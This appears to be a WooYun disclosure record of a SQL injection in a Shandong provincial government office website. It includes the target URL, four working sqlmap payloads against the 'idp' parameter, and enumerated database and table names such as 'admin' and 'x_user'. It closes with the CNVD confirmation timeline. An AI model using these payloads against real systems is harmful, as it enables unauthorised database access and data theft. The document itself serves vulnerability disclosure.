WooYun (WooYun.org) historical vulnerability search: http://wy.zone.ci/
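2015-03-09: Details reported to the vendor; awaiting vendor handling
2015-03-13: Vendor has confirmed; details disclosed to the vendor only
2015-03-23: Details disclosed to core white hats and experts in related fields
2015-04-02: Details disclosed to regular white hats
2015-04-12: Details disclosed to intern white hats
2015-04-23: Details disclosed to the public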
SQL injection vulnerability at the Economic and Trade Office of the Shandong Provincial People's Government Office in Beijing
http://www.shandongipc.gov.cn/news_p.php?idp=52
Place: GET
Parameter: idp
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: idp=52 AND 7459=7459

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: idp=52 AND (SELECT 5737 FROM(SELECT COUNT(*),CONCAT(0x716b637171,(SELECT (CASE WHEN (5737=5737) THEN 1 ELSE 0 END)),0x7164626d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: idp=-9930 UNION ALL SELECT CONCAT(0x716b637171,0x52755155446c4f6d7a5a,0x7164626d71)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: idp=52 AND SLEEP(5)
---
[00:36:35] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5.0
[00:41:17] [INFO] fetching database names
[00:41:17] [INFO] the SQL query used returns 2 entries
[00:41:17] [INFO] resumed: "information_schema"
[00:41:17] [INFO] resumed: "shangdong"
available databases [2]:
[*] information_schema
[*] shangdong

[00:42:19] [INFO] fetching tables for database: 'shangdong'
[00:42:19] [INFO] the SQL query used returns 15 entries
[00:42:19] [INFO] resumed: "Userandip"
[00:42:19] [INFO] resumed: "Zzday"
[00:42:19] [INFO] resumed: "ader"
[00:42:19] [INFO] resumed: "admin"
[00:42:19] [INFO] resumed: "adminz"
[00:42:19] [INFO] resumed: "article"
[00:42:19] [INFO] resumed: "bigclass"
[00:42:19] [INFO] resumed: "img"
[00:42:19] [INFO] resumed: "news"
[00:42:19] [INFO] resumed: "partd"
[00:42:19] [INFO] resumed: "partd2"
[00:42:19] [INFO] resumed: "smallclass"
[00:42:19] [INFO] resumed: "test1"
[00:42:19] [INFO] resumed: "x_user"
[00:42:19] [INFO] resumed: "yqlink"
Database: shangdong
[15 tables]
+------------+
| Userandip  |
| Zzday      |
| ader       |
| admin      |
| adminz     |
| article    |
| bigclass   |
| img        |
| news       |
| partd      |
| partd2     |
| smallclass |
| test1      |
| x_user     |
| yqlink     |
+------------+
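Proven
Severity: Medium
Vulnerability Rank: 10
Confirmation time: 2015-03-13 16:31
CNVD has confirmed the situation described and has passed it to CNCERT for dispatch to the branch center, which will follow up and coordinate with the organization managing the website to handle it.
None yet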